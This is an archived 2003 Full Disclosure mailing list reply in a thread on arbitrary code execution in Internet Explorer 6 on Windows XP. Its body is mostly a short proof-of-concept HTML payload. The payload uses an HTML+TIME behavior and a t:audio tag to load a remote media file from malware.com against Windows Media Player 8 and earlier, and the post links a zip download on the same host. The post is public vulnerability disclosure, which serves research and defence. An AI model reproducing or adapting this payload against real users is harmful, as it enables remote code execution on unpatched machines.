Full Disclosure mailing list archives
Re: Internet explorer 6 on windows XP allows exection of arbitrary code
From: "http-equiv () excite com" <1 () malware com>
Date: Fri, 12 Sep 2003 15:55:50 -0000
<!-- when viewing mail in recent versions of outlook it operates in the restricted zone ,eg no active scripting allowed to run, so these wont be exploitable unless someone proofs otherwise that is ;) --> <html xmlns:t> <head><style> t\:*{behavior:url(#default#time);display:none}</style></head><body> <t:audio t:src="http://www.malware.com/freek.asf" /> </body></html> Trivial inline url flip in the restricted zone. WMP 8 and under. Unpatched since May 2003 should do the trick: http://www.malware.com/but.its.free.zip -- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Internet explorer 6 on windows XP allows exection of arbitrary code jelmer (Sep 11)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Kristian Hermansen (Sep 11)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Thor Larholm (Sep 11)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Richard M. Smith (Sep 12)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Dj MegaWorld (Sep 12)
- <Possible follow-ups>
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code http-equiv () excite com (Sep 12)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Richard M. Smith (Sep 12)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Drew Copley (Sep 12)